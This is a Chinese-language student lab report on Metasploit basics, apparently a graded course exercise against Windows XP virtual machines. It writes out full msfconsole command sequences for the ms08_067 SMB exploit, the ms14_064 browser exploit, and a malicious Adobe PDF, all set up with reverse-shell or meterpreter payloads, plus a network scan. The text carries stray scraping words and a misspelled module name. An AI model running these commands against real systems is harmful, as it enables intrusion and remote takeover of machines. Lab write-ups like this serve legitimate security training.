exploit: 是指攻擊者或滲透測試者利用一個系統、應用或服務中的安全漏洞所進行的攻擊行爲, 包括利用緩衝區溢出、Web應用程序漏洞攻擊,以及利用配置錯誤等。按照所利用的安全漏洞所在的位置分爲主動滲透攻擊(攻擊某個系統服務),被動滲透攻擊(攻擊某個客戶端應用)。css
payload:目標系統在被滲透攻擊以後去執行的代碼一段指令或稱爲shellcode。linux
encode:編碼器,確保攻擊載荷中不會出現滲透攻擊過程當中應加以免的「壞字符」;改變特徵碼,對攻擊載荷進行「免殺」處理。shell
2.1一個主動攻擊實踐,如ms08_067; (1分)windows
攻擊機:kali linux ip:222.28.141.136api
靶機: windows xp [版本 5.1.2600] ip:192.168.33.133 (中文版)瀏覽器
使用漏洞:ms08_067安全
輸入 use exploit/windows/smb/ms08_067_netapi 網絡
設置payload,tcp反向回連 set payload generic/shell_reverse_tcp tcp
設置攻擊機ip set LHOST 222.28.141.136 測試
設置攻擊端口 set LPORT 4322
設置靶機ip set RHOST 192.168.33.133
設置自動選擇目標系統類型 set target 0
攻擊失敗!!!經過網上查找資料,發現多是打過補丁的緣由,更換虛擬機。因爲換了網絡,因此第二次實驗時ip也發生了變化。
攻擊機:kali linux ip:192.168.33.132
靶機: windows xp [version 5.1.2600] ip:192.168.33.134
重複上述步驟:
攻擊成功!!!
2.2 一個針對瀏覽器的攻擊,ms14_064;(惟一)
攻擊機:kali linux ip:192.168.33.132
靶機: windows xp [version 5.1.2600] ip:192.168.33.134
首先,我看了一下有哪些攻擊瀏覽器的漏洞可用
下面還有不少........可是不必定均可用,隨便選擇一個漏洞ms14_064試試。
輸入指令 use exploit/windows/browser/ms14_064_ole_code_execution //使用瀏覽器ms14_064漏洞
進行以下的配置:
set payload windows/meterpreter/reverse_http //http反向回連
set LHOST 192.168.33.132 //攻擊機ip
set LPORT 4322 //攻擊端口固定
set URIPATH 4322hyt //統一資源標識符路徑設置
在訪問 http://192.168.33.132:8080/4322hyt 時,可見攻擊機出現訪問信息。
攻擊成功!!!
2.3 一個針對客戶端的攻擊,如Adobe;(1分)
攻擊機:kali IP:192.168.119.128
靶機:windows XP sp2 IP:192.168.119.133
在攻擊機kali輸入msfconsole進入控制檯,輸入指令: use exloit/windows/fileformat/adobe_u3d_meshdecl
進行以下配置:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.33.136 //攻擊機ip
set LPORT 4322
//攻擊端口
set FILENAME hyt4322.pdf
//設置生成pdf文件的名字
exploit
//攻擊
在以上目錄中找到該pdf文件,用共享文件夾共享到本身的主機,再拖到靶機。
在靶機上打開該pdf文件。
攻擊者能夠看到相應的信息,攻擊成功!!!
2.4 成功應用任何一個輔助模塊。(0.5分)
使用ARP請求枚舉本地局域網中全部活躍主機
輸入指令: use auxiliary/scanner/discovery/udp_seep
show options
將RHOSTS設置爲 192.168.33.0/24,即掃描子網號爲192.168.33.0的子網內的全部主機
結果掃描了256個主機,4個活躍,其中192.168.33.135是靶機的IP.
本次實踐讓我對msf基礎有了更加深刻的理解,見識到了它的功能強大性,意識到漏洞庫持續更新的重要性。對msf經常使用模塊的使用也在必定程度上熟練了一些。同時再遇到一些錯誤時,經過提示,進行猜想,上網查找,解決了很多問題,提升了我獨立思考的能力。